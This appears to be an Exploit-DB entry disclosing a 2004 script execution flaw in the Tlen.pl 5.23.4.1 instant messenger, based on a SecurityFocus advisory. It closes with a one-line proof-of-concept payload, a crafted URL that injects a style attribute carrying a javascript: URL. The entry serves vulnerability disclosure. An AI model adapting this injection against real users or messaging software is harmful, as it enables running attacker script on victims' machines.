Tlen.pl 5.23.4.1 - Instant Messenger Remote Script Execution Vulnerability

2004-12-20T00:00:00
ID EDB-ID:25042
Type exploitdb
Reporter Jaroslaw Sajko
Modified 2004-12-20T00:00:00

Description

Tlen.pl 5.23.4 .1 Instant Messenger Remote Script Execution Vulnerability. Webapps exploit for cgi platform

                                        
                                            source: http://www.securityfocus.com/bid/12050/info

Tlen.pl is reported prone to a potential script execution vulnerability. It is reported that this issue may allow remote attackers to execute arbitrary script code on a vulnerable computer, which may lead to various attacks.

Tlen.pl 5.23.4.1 and prior versions are affected by this vulnerability. 

www.tlen.pl"style=background-image:url(javascript:alert(%22You%20are%20owned!%22));.pl